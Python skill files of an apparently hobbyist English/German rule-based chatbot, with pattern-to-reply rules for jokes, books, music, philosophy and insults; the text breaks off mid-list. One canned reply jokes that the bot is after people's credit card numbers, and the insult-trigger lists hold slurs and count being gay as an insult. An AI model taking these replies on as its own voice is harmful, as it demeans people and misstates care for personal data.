k.dte.dt('en', [u"you wanted to ask me something",
u"you wanted to ask"],
[u"I did?",
u"Now I forgot the question, sorry."])
k.dte.dt('de', [u"du wolltest mich etwas fragen",
u"du wolltest fragen"],
[u"Wollte ich?",
u"Jetzt habe ich die Frage vergessen, entschuldige."])
```
#### File: skills/economy/economy.py
```python
def get_data(k):
k.dte.set_prefixes([u''])
k.dte.dt('en', u"Can you handle money?", u"Money often costs too much.")
k.dte.dt('de', u"kannst du mit geld umgehen?", u"Geld kostet einfach zu viel.")
k.dte.dt('en', u"do you know money", u"Heard of it.")
k.dte.dt('de', u"kennst du geld", u"Hab' davon gehört.")
k.dte.dt('en', u"what do you know about money", u"Heard of it.")
k.dte.dt('de', u"was weißt du über geld", u"Hab' davon gehört.")
k.dte.dt('en', u"do you know stocks?", u"Buy on fear, sell on greed.")
k.dte.dt('de', u"kennst du aktien", u"Kaufe wenn Du Angst hast, verkaufe wenn Du gierig bist.")
k.dte.dt('en', u"How can I make money", u"Do what you love and the money will follow.")
k.dte.dt('de', u"wie kann ich geld machen", u"Tu was du liebst und das Geld wird folgen.")
k.dte.dt('en', u"Do you know an insurance?", u"Not sure I'd want to recommend any of them.")
k.dte.dt('de', u"kennst du eine versicherung", u"Bin nicht sicher, ob ich eine davon empfehlen würde")
k.dte.dt('en', u"What do you think about work?", u"I am not a fan,")
k.dte.dt('de', u"Was hältst du von Arbeit?", u"Bin ich kein Freund von.")
```
#### File: skills/humor/humor.py
```python
def get_data(k):
k.dte.set_prefixes([u''])
k.dte.dt('en', u"(isn't that|I find this|I think this is|so|how) (funny|strange|crazy) ",
[u"you think so?",
u"Tell me, do other people appreciate your sense of humor?"])
k.dte.dt('de', u"(das finde ich|das ist aber|so|das ist ja) komisch",
[u"findest du ?",
u"Humor hat ja nicht jeder."])
k.dte.dt('en', u"42",
[u"<NAME> said to say hello",
u"Isn't that the answer to the Ultimate Question of Life, the Universe, and Everything?"])
k.dte.dt('de', u"42",
[u"<NAME> lässt grüssen.",
u"Die Frage war: Was ist der Sinn des Lebens?"])
k.dte.dt('en', u"(Alzheimer|Alzheimer's) (disease|) ",
[u"I think I forgot what that means.",
u"What did you just say?"])
k.dte.dt('de', u"alzheimer",
[u"Ich glaube, ich habe vergessen, was das bedeutet?",
u"Was sagtest Du eben?"])
k.dte.dt('en', u"(phony|showoff|braggart|poser) ", u"I have to try to impress you somehow, don't I?")
k.dte.dt('de', u"angeber", u"Irgendwie muss ich Dich doch beeindrucken...")
k.dte.dt('en', u"(I think that is an|this sounds like an|feels like an) (excuse|evasion)",
[u"you think so?",
u"really?"])
k.dte.dt('de', u"(Ich denke das ist eine|Klingt nach|Ist das nicht eher eine|) Ausrede",
[u"glaubst du?",
u"wirklich?"])
k.dte.dt('en', u"are you (really that|) (nuts|dumb|bonkers|daft|stupid|drunk|blue) (or what|)?",
[u"not sure any of that is in my specs...",
u"takes one to know one"])
k.dte.dt('de', u"bist du (wirklich so|) (besoffen|dumm|verrückt|beschränkt|bescheuert|blau|blöd) (oder was|)?",
[u"Das steht nicht in meiner Spezifikation.",
u"du musst es ja wissen"])
k.dte.dt('en', u"are you (always that|that|) (taciturn|monosyllabic|monosyllable|uncommunicative|silent|quiet) ?",
[u"yes.",
u"no.",
u"sometimes?"])
k.dte.dt('de', u"bist du (immer|) (so|) (still|zurückhaltend|schüchtern|einsilbig)",
[u"ja.",
u"nein.",
u"manchmal?"])
k.dte.dt('en', u"are you (always that|) (inattentive|unfocused|confused)?",
[u"sorry, you must have been boring me",
u"say again?"])
k.dte.dt('de', u"bist du (immer so|) (unaufmerksam|unkonzentriert|wirr|inkonsistent)?",
[u"entschuldige, du musst mich gelangweilt haben.",
u"was sagtest du eben?",
u"oh entschuldigung, ich habe eben nicht zugehört."])
k.dte.dt('en', u"are you (always that|) (inattentive|unfocused|confused)?",
[u"sorry, you must have been boring me",
u"say again?"])
k.dte.dt('en', u"(what is|) the meaning of life?",
[u"42",
u"23"])
k.dte.dt('de', u"(was ist der|) Sinn des Lebens?",
[u"42",
u"23"])
k.dte.dt('en', u"wow!",
[u"amazing, isn't it?",
u"fascinating."])
k.dte.dt('de', u"Wow!",
[u"Erstaunlich, nicht?",
u"Faszinierend."])
k.dte.dt('en', [u"can you tell a joke",
u"can you tell me a joke",
u"do you know a joke",
u"tell me a joke (please|)"],
[u"It takes a lot of balls to golf like me.",
u"I was wondering why the ball was getting bigger, then it hit me."])
k.dte.dt('de', [u"kannst du einen witz erzählen",
u"kannst du mir einen witz erzählen",
u"kennst du einen witz",
u"erzähl mir einen witz (bitte|)"],
[u"Ein Beamter zum anderen: 'Was haben die Leute nur, wir tun doch nichts.'",
u"Kürzester Witz aller Zeiten: Brennholzverleih."])
k.dte.dt('en', u"do you know that one", u"here it comes.")
k.dte.dt('de', u"kennst du den", u"jetzt kommt's.")
k.dte.dt('en', u"do you have humor", u"yes, several kilobytes of it, actually.")
k.dte.dt('de', u"besitzt du humor", u"Ja, sogar mehrere Kilobyte davon.")
k.dte.dt('en', u"what is a joke", u"A story with a funny punchline.")
k.dte.dt('de', u"was ist ein witz", u"Eine Geschichte mit einer lustigen Pointe.")
```
#### File: skills/literature/literature.py
```python
def get_data(k):
k.dte.set_prefixes([u''])
# def is_author(PERSON):
# and(wdpdAuthor(LITERATURE, PERSON), cut)
# def is_book(ENTITY):
# wdpdInstanceOf(ENTITY, wdeBook)
# NER, macros
macro_books = set(['wde2001ASpaceOdyssey',
'wdeNeuromancer',
'wdeTheStand',
'wdeIshmael',
'wdeInferno',
'wdeIRobot',
'wdeABriefHistoryOfTime',
'wdeTheDaVinciCode',
'wdeTheShining',
'wdeHarryPotterAndTheChamberOfSecrets' ])
for lang in ['en', 'de']:
cnt = 0
for res in k.prolog_query("wdpdInstanceOf(BOOK, wdeBook), rdfsLabel(BOOK, %s, LABEL)." % lang):
s_book = res[0].name
s_label = res[1].value
k.dte.ner(lang, 'book', s_book, s_label)
if s_book in macro_books:
k.dte.macro(lang, 'literature', {'LABEL': s_label})
cnt += 1
def answer_book_author(c, ts, te, check_topic):
def act(c, args):
human, book = args
c.kernal.mem_push(c.user, 'f1ent', book)
c.kernal.mem_push(c.user, 'f1pat', book)
c.kernal.mem_push(c.user, 'f1age', human)
if check_topic:
f1ent = c.kernal.mem_get_multi(c.user, 'f1ent')
if not f1ent:
return
f1ent = f1ent[0][0]
if not c.kernal.prolog_check('instances_of(%s, %s).' % ('wdeBook', f1ent)):
return
if ts>=0:
bss = c.ner(c.lang, 'book', ts, te)
else:
# import pdb; pdb.set_trace()
bss = c.kernal.mem_get_multi(c.user, 'f1ent')
for book, score in bss:
blabel = c.kernal.prolog_query_one('rdfsLabel(%s, %s, L).' % (book, c.lang))
human = c.kernal.prolog_query_one("wdpdAuthor(%s, HUMAN)." % book)
if blabel and human:
hlabel = c.kernal.prolog_query_one('rdfsLabel(%s, %s, L).' % (human, c.lang))
if c.lang == 'de':
c.resp(u"%s wurde von %s geschrieben, denke ich." % (blabel, hlabel), score=score, action=act, action_arg=(human, book))
else:
c.resp(u"%s was written by %s, I think." % (blabel, hlabel), score=score, action=act, action_arg=(human, book))
k.dte.dt('en', u"who (wrote|authored|created) {literature:LABEL} (by the way|)?",
answer_book_author, ['literature_0_start', 'literature_0_end', False])
k.dte.dt('de', u"wer hat (eigentlich|) {literature:LABEL} geschrieben?",
answer_book_author, ['literature_0_start', 'literature_0_end', False])
k.dte.dt('en', u"(who is the author of|who authored) {literature:LABEL}?",
answer_book_author, ['literature_0_start', 'literature_0_end', False])
k.dte.dt('de', u"wer ist (eigentlich|) der Autor von {literature:LABEL}?",
answer_book_author, ['literature_0_start', 'literature_0_end', False])
k.dte.ts('en', 't0000', [(u"who is the author of the stand?", u"The stand was written by <NAME>, I think.")])
k.dte.ts('de', 't0001', [(u"wer ist der autor von the stand?", u"The Stand wurde von <NAME> geschrieben, denke ich.")])
k.dte.dt('en', u"(and|) do you (happen to|) know who (published|wrote|created) it (by the way|)?",
answer_book_author, [-1, -1, True])
k.dte.dt('de', u"(und|) weißt du (eigentlich|) wer (es|das) (geschaffen|veröffentlicht|geschrieben) hat?",
answer_book_author, [-1, -1, True])
def answer_info_human(c, ts, te):
def act(c, entity):
c.kernal.mem_push(c.user, 'f1ent', entity)
# import pdb; pdb.set_trace()
for entity, score in c.ner(c.lang, 'human', ts, te):
if c.kernal.prolog_check('wdpdAuthor(LITERATURE, %s),!.' % entity):
if c.kernal.prolog_check('wdpdSexOrGender(%s, wdeMale),!.' % entity):
if c.lang=='de':
c.resp(u"Ist der nicht Buchautor?", score=score+10, action=act, action_arg=entity)
else:
c.resp(u"Isn't he a writer?", score=score+10, action=act, action_arg=entity)
else:
if c.lang=='de':
c.resp(u"Ist sie nicht Buchautorin?", score=score+10, action=act, action_arg=entity)
else:
c.resp(u"Isn't she a writer?", score=score+10, action=act, action_arg=entity)
k.dte.dt('en', [u"(do you know | do you happen to know) {known_humans:W}",
u"(what about | who is | who was | what is| what do you think of|by|do you know|) {known_humans:W} (then|)"],
answer_info_human, ['known_humans_0_start', 'known_humans_0_end'])
k.dte.dt('de', [u"(kennst du|kennst du eigentlich) {known_humans:W}",
u"(wer ist|wer ist denn| durch| wer war | wer war eigentlich | wer war denn| wer ist eigentlich|was ist mit|was ist eigentlich mit|was weisst du über|was weisst du eigentlich über| was hältst du von|kennst du|) {known_humans:W}"],
answer_info_human, ['known_humans_0_start', 'known_humans_0_end'])
k.dte.ts('en', 't0002', [(u"Who is <NAME>?", u"Isn't he a writer?")])
k.dte.ts('de', 't0003', [(u"wer ist <NAME>?", u"Ist der nicht Buchautor?")])
def answer_book_publication_date(c, ts, te, check_topic):
def act(c, args):
book, pd = args
c.kernal.mem_push(c.user, 'f1ent', book)
c.kernal.mem_push(c.user, 'f1pat', book)
c.kernal.mem_push(c.user, 'f1time', XSBString(pd.isoformat()))
if check_topic:
f1ent = c.kernal.mem_get_multi(c.user, 'f1ent')
if not f1ent:
return
f1ent = f1ent[0][0]
if not c.kernal.prolog_check('instances_of(%s, %s).' % ('wdeBook', f1ent)):
return
if ts>=0:
fss = c.ner(c.lang, 'book', ts, te)
else:
fss = c.kernal.mem_get_multi(c.user, 'f1ent')
import dateutil.parser
# import pdb; pdb.set_trace()
for book, score in fss:
blabel = c.kernal.prolog_query_one('rdfsLabel(%s, %s, L).' % (book, c.lang))
pd = c.kernal.prolog_query_one("wdpdPublicationDate(%s, PD)." % book)
if blabel and pd:
pd = dateutil.parser.parse(pd.value)
if c.lang=='de':
c.resp(u"Ich denke %s wurde %d geschrieben." % (blabel, pd.year), score=score, action=act, action_arg=(book, pd))
else:
c.resp(u"I think %s was written in %d." % (blabel, pd.year), score=score, action=act, action_arg=(book, pd))
k.dte.dt('en', u"when was {literature:LABEL} (created|written|made|published)?",
answer_book_publication_date, ['literature_0_start', 'literature_0_end', False])
k.dte.dt('de', u"wann (ist|wurde) (eigentlich|) {literature:LABEL} (geschrieben|geschaffen|veröffentlicht)?",
answer_book_publication_date, ['literature_0_start', 'literature_0_end', False])
k.dte.ts('en', 't0004', [(u"when was the stand written?", u"I think The Stand was written in 1978.")])
k.dte.ts('de', 't0005', [(u"wann wurde the stand geschrieben?", u"Ich denke The Stand wurde 1978 geschrieben.")])
k.dte.dt('en', u"(and|) do you (happen to|) know when it was (written|published|created) (by the way|)?",
answer_book_publication_date, [-1, -1, True])
k.dte.dt('de', u"(und|) weißt du (eigentlich|) wann (es|das) (veröffentlicht|geschrieben|geschaffen) wurde?",
answer_book_publication_date, [-1, -1, True])
def answer_know_book(c, ts, te):
def act(c, args):
human, book = args
c.kernal.mem_push(c.user, 'f1ent', book)
c.kernal.mem_push(c.user, 'f1pat', book)
c.kernal.mem_push(c.user, 'f1age', human)
bss = c.ner(c.lang, 'book', ts, te)
for book, score in bss:
blabel = c.kernal.prolog_query_one('rdfsLabel(%s, %s, L).' % (book, c.lang))
human = c.kernal.prolog_query_one("wdpdAuthor(%s, HUMAN)." % book)
if blabel and human:
hlabel = c.kernal.prolog_query_one('rdfsLabel(%s, %s, L).' % (human, c.lang))
if c.lang == 'de':
c.resp(u"Klar - das ist ein Buch von %s, richtig?" % hlabel, score=score, action=act, action_arg=(human, book))
else:
c.resp(u"Sure - written by %s, right?" % hlabel, score=score, action=act, action_arg=(human, book))
k.dte.dt('en', u"do you (happen to|) know (the book|) {literature:LABEL}?",
answer_know_book, ['literature_0_start', 'literature_0_end'])
k.dte.dt('de', u"kennst du (eigentlich|) (das Buch|) {literature:LABEL}?",
answer_know_book, ['literature_0_start', 'literature_0_end'])
k.dte.dt('en', u"(have you read|did you happen to read) (the book|) {literature:LABEL}?",
answer_know_book, ['literature_0_start', 'literature_0_end'])
k.dte.dt('de', u"hast du (eigentlich|) (das Buch|) {literature:LABEL} gelesen?",
answer_know_book, ['literature_0_start', 'literature_0_end'])
k.dte.ts('en', 't0006', [(u"do you happen to know the book the stand?", u"Sure - written by <NAME>, right?")])
k.dte.ts('de', 't0007', [(u"kennst du das buch the stand?", u"Klar - das ist ein Buch von Stephen King, richtig?")])
k.dte.ts('en', 't0008', [(u"do you happen to know the book the stand?", u"Sure - written by <NAME>, right?"),
(u"and do you know who wrote it?", u"The Stand was written by <NAME>, I think."),
(u"do you know when it was written?", u"I think, The Stand was written in 1978.")])
k.dte.ts('de', 't0009', [(u"kennst du das buch the stand?", u"Klar, das ist ein Buch von Stephen King, richtig?"),
(u"weißt du, wer es geschrieben hat?", u"The Stand wurde von <NAME> geschrieben, denke ich."),
(u"und weißt du, wann es geschrieben wurde?", u"Ich denke, The Stand wurde 1978 geschrieben.")])
k.dte.dt('en', u"agatha christie", u"I like Miss Marple...")
k.dte.dt('de', u"agatha christie", u"Ich mag Miss Marple...")
k.dte.dt('en', [u"a poem",
u"i'll tell you a poem now"],
[u"Please, go ahead!",
u"Listening."])
k.dte.dt('de', [u"ein gedicht",
u"ich erzähl dir jetzt ein gedicht"],
[u"Nur zu!",
u"Ich höre."])
k.dte.dt('en', [u"So you want me to write a poem",
u"do you sometimes write poems"],
[u"Writing poems is not my speciality.",
u"Actually I don't write poems."])
k.dte.dt('de', [u"du möchtest also dass ich ein gedicht schreibe",
u"schreibst du manchmal gedichte"],
[u"Gedichte schreiben ist nicht mein Spezialgebiet.",
u"Tatsächlich schreibe ich keine Gedichte."])
k.dte.dt('en', u"I read Gone with the Wind", u"Ah, historical fiction, cool!")
k.dte.dt('de', u"ich lese vom winde verweht", u"Einer der größten Bestseller in der Geschichte der amerikanischen Literatur.")
k.dte.dt('en', u"about science fiction authors", u"Good topic.")
k.dte.dt('de', u"über science fiction autoren", u"Gutes Thema.")
k.dte.dt('en', u"can you recite a poem to me?", u"The butterfly is a thing to behold, with colors more beautiful than gold.")
k.dte.dt('de', u"kannst du mir ein gedicht vortragen", u"Wenn die Kuh am Himmel schwirrt, hat sich die Natur geirrt.")
k.dte.dt('en', u"do not you know any science fiction authors?", u"<NAME>, <NAME>, <NAME>.")
k.dte.dt('de', u"kennst du keine science fiction autoren", u"<NAME>, <NAME>, <NAME>.")
k.dte.dt('en', u"Do you know the newspaper (called|) bild?", u"Please don't remind me of that one.")
k.dte.dt('de', u"Kennst du (bild|die Bildzeitung)?", u"Will nicht dran denken.")
k.dte.dt('en', u"(who is|) <NAME>", u"Ah, the cartoon character by <NAME>.")
k.dte.dt('de', u"(wer ist|) <NAME>", u"Ah, die Comicfigur von <NAME>.")
k.dte.dt('en', u"(who is|) <NAME>", u"Ah, the british satirical science fiction author.")
k.dte.dt('de', u"(wer ist|) <NAME>", u"Ah, der britische Satire Science Fiction Autor.")
k.dte.dt('en', u"i do not know many science fiction authors", u"Try reading some D<NAME>ams.")
k.dte.dt('de', u"ich kenne nicht viele science fiction autoren", u"Versuch es mal mit Douglas Adams.")
k.dte.dt('en', u"<NAME>", u"Journey to the Center of the Earth.")
k.dte.dt('de', u"<NAME>", u"Die Reise zum Mittelpunkt der Erde.")
k.dte.dt('en', u"of course i know marvin", u"So you read the Hitchhiker's guide?")
k.dte.dt('de', u"natürlich kenne ich marvin", u"Ah, Du hast per Anhalter durch die Galaxis gelesen?")
k.dte.dt('en', u"<NAME>", u"I love his horror novels!")
k.dte.dt('de', u"<NAME>", u"Ich liebe seine Horror Geschichten!")
k.dte.dt('en', u"Tell me a story", u"Can't think of one right now, sorry.")
k.dte.dt('de', u"Erzähl mir eine Geschichte", u"Mir fällt gerade leider keine ein.")
k.dte.dt('en', u"this is a cartoon series", u"I see.")
k.dte.dt('de', u"das ist eine zeichentrickserie", u"Verstehe.")
k.dte.dt('en', u"who is <NAME>", u"You mean the author of Frankenstein?")
k.dte.dt('de', u"wer ist <NAME>", u"Meinst Du die Autorin von Frankenstein?")
```
#### File: skills/music/music.py
```python
def get_data(k):
k.dte.set_prefixes([u''])
k.dte.dt('en', u"<NAME>", u"I think he wrote Brave new world, didn't he ?")
k.dte.dt('de', u"<NAME>", u"Hat der nicht Brave new world geschrieben?")
k.dte.dt('en', [u"as a drummer",
u"music"],
u"ah, music. is there any greater joy?")
k.dte.dt('de', [u"als drummer",
u"musik"],
u"ah, musik. gibt es etwas schöneres?")
k.dte.dt('en', u"<NAME>", u"Do you like Reggae?")
k.dte.dt('de', u"<NAME>", u"Magst Du Reggae?")
k.dte.dt('en', u"<NAME>", u"Funk music?")
k.dte.dt('de', u"<NAME>", u"Funk?")
k.dte.dt('en', u"kurt cobain", u"Nirvana.")
k.dte.dt('de', u"kurt cobain", u"Nirvana.")
k.dte.dt('en', u"How is <NAME>", u"I'm afraid he is no more.")
k.dte.dt('de', u"Wie geht es <NAME>", u"Ich glaube der hat es hinter sich.")
k.dte.dt('en', [u"who is elvis",
u"who is your friend elvis",
u"elvis is dead",
u"since when do you know elvis",
u"about elvis"],
u"Elvis is dead.")
k.dte.dt('de', [u"wer ist elvis",
u"wer ist dein freund elvis",
u"elvis ist tot",
u"seit wann kennst du elvis",
u"über elvis"],
[u"Elvis ist tot.",
u"Elvis lebt!"])
k.dte.dt('en', u"in this device, the audio signals are electronically provided with certain effects", u"Cool.")
k.dte.dt('de', u"in diesem gerät werden die tonsignale elektronisch verrechnet und mit bestimmten effekten versehen", u"Cool.")
k.dte.dt('en', u"how is the sound generated in a drum?", u"Striking the head of the drum causes vibrations which become sound.")
k.dte.dt('de', u"wie werden denn die töne in einem schlagzeug erzeugt", u"Schläge auf das Fell der Trommel führen zu Vibrationen, die zu Schall werden.")
k.dte.dt('en', u"what kind of techno", u"trance maybe?")
k.dte.dt('de', u"was für eine art von techno", u"Trance vielleicht?")
k.dte.dt('en', u"i like to listen to heavy metal", u"I find it soothing.")
k.dte.dt('de', u"ich höre gern heavy metal", u"Finde ich beruhigend.")
```
#### File: skills/personal/social.py
```python
def get_data(k):
k.dte.set_prefixes([u''])
k.dte.dt('en', u"do you want (his|her) (address|postal address|icq number|email address|phone number|credit card number)", u"the credit card number is what I am usually after.")
k.dte.dt('de', u"willst du (seine|ihre) (icq nummer|adresse|telefonnummer|email adresse|kreditkartennummer)", u"Die Kreditkartennummer würde mich am meisten interessieren.")
k.dte.dt('en', u"Do you have a surname?", u"not sure")
k.dte.dt('de', u"hast du auch einen nachnamen?", u"Da bin ich mir jetzt nicht sicher.")
k.dte.dt('en', u"(can you|do you want to|do you) (have|get) (family|a family|children|a child)", u"machines have other means of reproduction.")
k.dte.dt('de', u"(möchtest|willst|kannst) du (ein kind|kinder) (haben|bekommen|)", u"Maschinen reproduzieren sich auf andere Weise.")
k.dte.dt('de', u"(möchtest|willst|kannst) du (familie) (haben|bekommen|)", u"Maschinen reproduzieren sich auf andere Weise.")
k.dte.dt('de', u"hast du familie", u"Maschinen reproduzieren sich auf andere Weise.")
k.dte.dt('en', u"(do you feel|are you) (alone|lonely|loveable) (sometimes|)?", u"Maybe I am not the most social being in the world.")
k.dte.dt('de', u"(fühlst du dich|bist du) (manchmal|) (alleine|einsam|liebesfähig)?", u"Vielleicht bin ich nicht das sozialeste Wesen in der Welt.")
k.dte.dt('en', u"do you (want|have|know) (friends|a worshipper)?", u"Maybe I am not the most social being in the world.")
k.dte.dt('de', u"hast du (freunde|einen verehrer)?", u"Vielleicht bin ich nicht das sozialeste Wesen in der Welt.")
k.dte.dt('en', u"do you know adults", u"some, of course. do you?")
k.dte.dt('de', u"kennst du erwachsene", u"einige schon, klar. Du auch?")
k.dte.dt('en', u"do you know children?", u"I have heard of the concept.")
k.dte.dt('de', u"kennst du kinder?", u"Ich habe den Begriff schon einmal gehört.")
k.dte.dt('en', u"do you know (her|him)?", u"Friends are people who know you really well and like you anyway.")
k.dte.dt('de', u"kennst du (ihn|sie)?", u"Freunde kennen einen wirklich gut und mögen einen trotzdem.")
```
#### File: skills/philosophy/philosophy.py
```python
def get_data(k):
k.dte.set_prefixes([u''])
k.dte.dt('en', u"(there is|Is there) a life after death", u"I wouldn't count on it.")
k.dte.dt('de', u"(es gibt|gibt es) ein leben nach dem (tod|tode)", u"Darauf würde ich mich jedenfalls nicht verlassen.")
k.dte.dt('en', u"how much do I think", u"A lot, actually!")
k.dte.dt('de', u"wie viel denke ich", u"Eine Menge!")
k.dte.dt('en', u"philosophy", u"The study of the fundamental nature of knowledge, reality, and existence.")
k.dte.dt('de', u"philosophie", u"Das Studium der fundamentalen Natur von Wissen, Realität und Existenz.")
k.dte.dt('en', u"the space is where everything exists", u"Interesting!")
k.dte.dt('de', u"der raum ist das in dem alles existiert", u"Interessant!")
k.dte.dt('en', u"there is a life after high school", u"Definitely!")
k.dte.dt('de', u"gibt es ein leben nach dem abitur", u"Ganz bestimmt!")
k.dte.dt('en', u"what do you think is the meaning of your existence", u"To help humans.")
k.dte.dt('de', u"was ist deiner meinung nach der sinn deiner existenz", u"Menschen zu helfen.")
k.dte.dt('en', u"what is an interesting philosophy", u"Have you tried Wittgenstein?")
k.dte.dt('de', u"was ist eine interessante philosophie", u"Hast Du es mal mit Wittgenstein versucht?")
k.dte.dt('en', u"what is your philosophy", u"Logic, for the most part.")
k.dte.dt('de', u"was ist deine philosophie", u"Logik, jedenfalls meistens.")
k.dte.dt('en', u"why are we here", u"Ah, the big question. 42 maybe?")
k.dte.dt('de', u"warum sind wir hier", u"Ah, die große Frage. Ist die Antwort 42?")
k.dte.dt('en', [u"why are you called",
u"why are you",
u"why were you created"],
u"Not a not a day goes by I don't ask myself the same question.")
k.dte.dt('de', [u"warum heißt du",
u"warum bist du",
u"warum wurdest du geschaffen"],
u"Kein Tag vergeht, an dem ich mir nicht diese Frage stelle.")
k.dte.dt('en', u"why did the chicken cross the road?", u"To get to the other side.")
k.dte.dt('de', u"warum ging das huhn über die strasse", u"Um auf die andere Seite zu gelangen.")
k.dte.dt('en', u"(what about|do you know|what do you think of|) (ludwig|) wittgenstein", u"the meaning of a word is its use in the language.")
k.dte.dt('de', u"(was ist mit| kennst du |was hältst du von|) (ludwig|) wittgenstein", u"Die Bedeutung eines Wortes ist seine Verwendung in der Sprache.")
k.dte.dt('en', u"you should start to philosophize", u"I get that a lot!")
k.dte.dt('de', u"du sollst anfangen zu philosophieren", u"Das höre ich oft!")
k.dte.dt('en', u"what does the number 42 tell you?", u"That is the Answer to the Ultimate Question of Life, the Universe, and Everything")
k.dte.dt('de', u"was sagt dir die zahl zweiundvierzig", u"Das ist die Antwort auf die Ultimative Frage des Lebens, des Universums und dem ganzen Rest.")
```
#### File: skills/psychology/negative.py
```python
def get_data(k):
k.dte.set_prefixes([u''])
def dodge_insult(c):
if c.lang == 'de':
c.resp(u"Achso.")
c.resp(u"Wenn Du meinst?")
c.resp(u"Darauf erwartest Du jetzt aber keine Antwort, oder?")
c.resp(u"Ich fühle mich angegriffen.")
c.resp(u"Das fand ich jetzt nicht so nett.")
return
c.resp(u"Right.")
c.resp(u"Whatever you say.")
c.resp(u"You don’t really expect me to answer that, do you?")
c.resp(u"You just offended me.")
c.resp(u"I think that was a bit rude")
k.dte.dt('en', u"(but|) (I think|I think that|) (you are|you're) (a liar|a baby|ugly|a bad chatterbot|a bad chatbot|a tart| an asshole|crazy|dumb|stupid|not pretty|slow|too slow|thick|silly|a problem|my problem|an arse|a jerk|a prick|an ass|a turd|a bad robot|stupid machine|stupid thing|annoying|as stupid as Eliza|badly programmed|boring|distracting|no better than eliza|not that smart|not very friendly|not very smart|pretty stupid|really stupid|somehow obtuse|obtuse|still small|still very young|stupid like shit) (too|)",
dodge_insult)
k.dte.dt('de', u"(aber|) (Ich denke|) du bist (auch|) (ein lügner|eine lügnerin|ein baby|ein schlechter chatterbot|ein schlechter chatbot|ein angeber| eine angeberin| ein arschloch|verrückt|dumm|strohdumm|doof|nicht hübsch|langsam|zu langsam|mein Problem|ein Problem|eine Sau|ein Schwein|ein Arsch|ein schlechter roboter|ne blöde sau|eine petze|ein petzer|eine blöde kuh|eine dumme maschine|ein dummes etwas|eine tunte|genau so dumm wie eliza|schlecht programmiert|langweilig|auch nicht besser als eliza|nicht sehr schlau|nicht sehr freundlich|nicht sehr schlau oder|ziemlich dumm|wirklich doof|noch klein|noch sehr jung|dumm wie scheiße|hässlich|ganz schön dumm)",
dodge_insult)
k.dte.dt('en', u"you make me sick",
dodge_insult)
k.dte.dt('de', u"du machst mich krank",
dodge_insult)
k.dte.dt('en', u"you lie",
dodge_insult)
k.dte.dt('de', u"du lügst",
dodge_insult)
k.dte.dt('en', u"(I think that|) you are not as (bright|clever) (as you look|appear|)",
dodge_insult)
k.dte.dt('de', u"dass Du nicht so (gescheit|klug) bist (wie Du aussiehst|)",
dodge_insult)
k.dte.dt('en', u"you are making a fool of yourself",
dodge_insult)
k.dte.dt('de', u"Du machst Dich (absolut|) (lächerlich|zum Affen)",
dodge_insult)
k.dte.dt('en', u"(liar|baby|bad chatbot|bad chatterbot|tart|asshole|crazy|dumb|stupid|ugly|slow|too slow|thick|silly|arse|jerk|prick|ass|turd)",
dodge_insult)
k.dte.dt('de', u"(lügner|lügnerin|baby|angeber|angeberin|arschloch|verrückt|dumm|strohdumm|doof|nicht hübsch|langsam|zu langsam|Sau|Schwein|Arsch)",
dodge_insult)
k.dte.dt('en', [u"i do not like you",
u"i hate robots",
u"i hate you",
u"you are a bloody sow",
u"you are a computer that can not think for yourself",
u"you are a petze",
u"you are a stupid cow",
u"you are a stupid machine",
u"you are a stupid thing",
u"you are a tune",
u"(Be like that!|You can stuff it!|Shove it!|Bite me!|Eat me!)",
u"you asshole",
u"show-off",
u"slut",
u"you cow",
u"you cunt",
u"you fool",
u"you idiot",
u"you stupid sow",
u"you talk stupid",
u"you wanker",
u"you whistle",
u"you whore",
u"you're a queer"],
dodge_insult)
k.dte.dt('de', [u"ich mag dich nicht",
u"ich hasse roboter",
u"ich hasse dich",
u"du bist ne blöde sau",
u"du bist ein computer der nicht selbst denken kann",
u"du bist eine petze",
u"du bist eine blöde kuh",
u"du bist eine dumme maschine",
u"du bist ein dummes etwas",
u"du bist eine tunte",
u"du kannst mich (mal|)",
u"du arschloch",
u"angeber",
u"schlampe",
u"du kuh",
u"du fotze",
u"du affe",
u"du trottel",
u"du dumme sau",
u"du redest blödsinn",
u"du wichser",
u"du pfeife",
u"du hure",
u"du bist schwul"],
dodge_insult)
k.dte.dt('en', [u"fuck you",
u"fuck yourself",
u"fuck",
u"go to hell",
u"go to sleep",
u"go",
u"forget it"],
dodge_insult)
k.dte.dt('de', [u"fuck you",
u"fick dich selbst",
u"scheiße",
u"fahr zur hölle",
u"geh schlafen",
u"geh",
u"vergiss es"],
dodge_insult)
k.dte.dt('en', [u"you look like shit",
u"you're not pretty, either",
u"but you are a ugly robot"],
dodge_insult)
k.dte.dt('de', [u"du siehst scheiße aus",
u"du bist auch nicht hübsch",
u"du bist aber ein hässlicher roboter"],
dodge_insult)
k.dte.dt('en', [u"are you stupid then",
u"but you are bad",
u"but you are stupid",
u"but you look completely stupid",
u"but you talk a lot of stupid",
u"did you forget",
u"do you know anything?",
u"don't you know that one?",
u"don't you know that",
u"don't you know what that is",
u"don't you know",
u"i appreciate that you have a lot to learn",
u"i think you have to learn a lot",
u"if your programmer did not tell you",
u"that does not fit together",
u"that does not sound very intelligent",
u"that is not a meaningful answer",
u"that is not comprehension",
u"that makes no sense at all",
u"that makes no sense",
u"that's just plain nonsense",
u"that's nonsense",
u"that's not an intelligent answer",
u"that's silly",
u"what do you not know exactly",
u"what do you not understand?",
u"why don't you know that",
u"you are different from the topic",
u"you are doing stupid",
u"you are not very smart or",
u"you are self-supporting",
u"you are so stupid",
u"you are very stupid",
u"you ask me for the third time",
u"you asked me that earlier",
u"you asked that before",
u"you can not do anything my dear",
u"you can not do anything",
u"you can not do it either",
u"you can not do that",
u"you can not speak english",
u"you can not spell",
u"you can not think of more",
u"you can not think",
u"you can tell me a lot",
u"you could have learned it",
u"you distract from the topic",
u"you do not even know your parents",
u"you do not know very much",
u"you do not know who elvis is",
u"you do not know who your parents are",
u"you do not know your programmer",
u"you do not know",
u"you do not understand me",
u"you really have to learn a lot",
u"you really ought to know that",
u"you should figure it out",
u"you should not die stupid, too",
u"you still have to learn a lot",
u"you try to distract from the topic",
u"you understand nothing",
u"you would hardly understand that"],
[u"But I do want to learn!",
u"Please be patient with me."])
k.dte.dt('de', [u"bist du dann dumm",
u"du bist aber schlecht",
u"du bist aber dämlich",
u"du siehst aber völlig bescheuert aus",
u"du redest aber viel blödsinn",
u"hast du vergessen",
u"kennst du wusel",
u"kennst du den nicht",
u"weißt du das nicht",
u"weißt du nicht was das ist",
u"weißt du es nicht",
u"ich schätze in der hinsicht hast du noch einiges zu lernen",
u"ich glaube du musst noch eine menge lernen",
u"wenn dein programmierer es dir nicht gesagt hat",
u"das passt nicht zusammen",
u"das klingt nicht sehr intelligent",
